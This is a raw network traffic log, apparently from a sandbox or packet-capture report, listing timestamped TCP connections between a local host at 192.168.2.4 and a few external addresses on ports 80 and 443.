                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.336077929 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.340734959 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.340841055 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.345601082 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.345647097 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.347307920 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.350408077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.350455999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.354355097 CET4434984735.190.72.216192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.354888916 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.355099916 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.355120897 CET49847443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.355160952 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.355319023 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.356548071 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.356607914 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.359944105 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.360008001 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.360825062 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.364772081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.364867926 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.367527962 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.369527102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.369662046 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.370333910 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.374368906 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.374496937 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.374824047 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.375015974 CET49847443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.375029087 CET4434984735.190.72.216192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.375149965 CET4434984735.190.72.216192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.375170946 CET49847443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.375175953 CET4434984735.190.72.216192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.375401974 CET49847443192.168.2.435.190.72.216
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.473282099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.473336935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.474724054 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.474787951 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.479476929 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.479569912 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.484380960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.484457016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.488922119 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.488936901 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.489103079 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.493119001 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.493311882 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.496093035 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.496232033 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.499017954 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.499170065 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.502334118 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.502486944 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.504944086 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.504968882 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.507297039 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.507460117 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.509037018 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.510059118 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.510231972 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.512833118 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.512959957 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.515621901 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.515691042 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.518407106 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.518517017 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.521174908 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.521248102 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.524009943 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.524065018 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.526721001 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.526762009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.529222965 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.529314041 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.529476881 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.529613018 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.529673100 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.529705048 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.530134916 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.532259941 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.532385111 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.535113096 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.535192966 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.537872076 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.538003922 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.539841890 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.540601015 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.540651083 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.540714025 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.543370008 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.543507099 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.546749115 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.546823025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.548937082 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.549057007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.549365044 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.551731110 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.551743031 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.554481030 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.554577112 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.557276964 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.557368994 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.560014009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.560075998 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.562855005 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.562900066 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.565608025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.565638065 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.568541050 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.568670034 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.569466114 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.589684963 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.610003948 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.672817945 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.672904015 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.674062967 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.674160004 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.676192999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.676320076 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.678519964 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.678673029 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.680919886 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.681052923 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.683645964 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.683768034 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.685972929 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.686078072 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.688391924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.688457012 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.688848972 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.688950062 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.690918922 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.691056013 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.693439960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.693530083 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.695744038 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.695839882 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.697586060 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.697659016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.699811935 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.699928999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.702146053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.702220917 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.704272985 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.704463959 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.706569910 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.706666946 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.708879948 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.709028959 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.711114883 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.711169004 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.711472988 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.711591005 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.713550091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.713690996 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.716432095 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.716586113 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.718389988 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.718512058 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.720477104 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.720550060 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.722743988 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.722829103 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.725054979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.725074053 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.727422953 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.727433920 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.729794025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.729806900 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.731231928 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.731997967 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.732085943 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.734316111 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.734347105 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.736643076 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.736716032 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.738984108 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.739145041 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.741302967 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.741377115 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.743540049 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.743643999 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.745959044 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.746038914 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.748336077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.748436928 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.750544071 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.750691891 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.751512051 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.751876116 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.751921892 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.751983881 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.752803087 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.752901077 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.755168915 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.755181074 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.757380009 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.757476091 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.759789944 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.759849072 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.762000084 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.762255907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.764337063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.764415979 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.766674042 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.766766071 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.768965960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.769047022 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.771316051 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.771408081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.771625996 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.774214983 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.774260998 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.775986910 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.776088953 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.778213024 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.778296947 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.780484915 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.780772924 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.782882929 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.782980919 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.785183907 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.785356045 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.787564993 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.787621021 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.789812088 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.789879084 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.791851997 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.792033911 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.792135000 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.794356108 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.794461966 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.796724081 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.796781063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.798958063 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.799036980 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.800183058 CET8049848185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.810779095 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.810831070 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.810878992 CET4984880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.810880899 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.856017113 CET44349849116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.857521057 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.857532978 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.859056950 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.859181881 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.861104965 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.861118078 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.863137960 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.863234997 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.865559101 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.865732908 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.866487980 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.866492033 CET49849443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.867820024 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.867877007 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.870191097 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.870295048 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.872375965 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.872431993 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.872446060 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.874871016 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.874893904 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.874921083 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.874979019 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.877114058 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.877125025 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.878813982 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.878926039 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.879208088 CET4984080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.880621910 CET8049840185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.880762100 CET8049840185.215.113.16192.168.2.4
